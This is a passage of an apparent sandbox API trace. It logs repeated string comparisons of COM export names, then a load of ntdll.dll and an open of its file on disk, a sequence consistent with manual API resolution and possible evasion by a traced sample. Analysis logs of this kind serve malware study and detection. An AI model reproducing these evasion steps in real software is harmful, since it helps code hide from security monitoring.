(lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0254.471] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0254.471] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0254.471] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0254.471] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0254.471] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0254.471] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0254.471] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0254.471] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0254.471] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0254.472] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0254.472] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0254.473] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0254.473] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0254.473] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0254.473] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0254.473] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0254.473] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0254.473] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0254.473] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0254.473] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0254.473] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0254.473] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0254.474] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0254.475] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0254.476] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0254.476] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0254.476] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0254.476] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0254.476] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0254.476] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0254.476] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0254.476] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0254.476] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0254.476] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0254.476] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0254.476] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0254.476] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0254.477] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0254.478] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0254.478] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0254.478] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0254.478] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0254.478] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0254.478] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0254.478] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0254.478] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0254.478] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0254.478] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0254.478] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0254.478] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0254.478] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0254.478] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0254.478] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0254.478] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0254.478] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0254.478] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0254.478] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0254.478] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0254.478] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0254.478] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0254.478] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0254.479] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0254.479] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0254.479] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0254.479] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0254.480] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0254.481] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0254.481] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0254.481] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0254.481] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0254.481] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0254.481] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0254.481] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0254.482] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0254.687] GetProcessHeap () returned 0x4a0000 [0254.687] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x415a040 | out: hHeap=0x4a0000) returned 1 [0254.693] GetProcessHeap () returned 0x4a0000 [0254.694] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x10) returned 0x4b91a0 [0254.694] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0254.694] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0254.695] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0254.695] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0254.696] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: 